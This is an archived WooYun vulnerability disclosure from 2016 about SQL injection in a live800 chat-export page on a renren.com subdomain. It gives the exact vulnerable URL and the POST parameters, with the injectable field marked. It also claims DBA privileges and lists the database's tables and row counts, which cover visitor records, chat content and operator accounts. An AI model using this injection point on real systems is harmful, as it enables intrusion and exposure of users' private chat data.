乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-06-23: 细节已通知厂商并且等待厂商处理中 2016-06-24: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)export=txt&companyId=1&subStrSql=*
dba权限
Database: live800_im+---------------------+---------+| Table | Entries |+---------------------+---------+| visitor_access | 15081675 || operator_status | 633129 || chat_topic | 616252 || live800_system | 410676 || chat_content | 289363 || chat_sta | 289308 || chat_info | 285963 || leaveword_topic | 161506 || trustful_visitor | 78942 || leaveword | 74624 || contact | 71702 || cookie_contact | 71702 || company_config_data | 69254 || lost | 51034 || sync_info | 23170 || op_chat_content | 7200 || daily_flow_capacity | 1329 || sys_operate_log | 1266 || faq | 115 || operator | 82 || privilege | 82 || company_config | 36 || user_defined_button | 18 || company_ui_config | 16 || config_template | 12 || user_invite | 12 || company_skill | 11 || ad_column | 10 || routing_action | 6 || chat_config | 4 || leaveword_box | 3 || notify | 3 || routing_condition | 3 || routing_policy | 3 || routing_rule | 3 || canned_url | 1 || company | 1 || company_style | 1 || customization | 1 || fuf | 1 || ip_prohibit | 1 || operator_account | 1 |+---------------------+---------+
改改改
危害等级:无影响厂商忽略
忽略时间:2016-06-24 12:19
忽略
暂无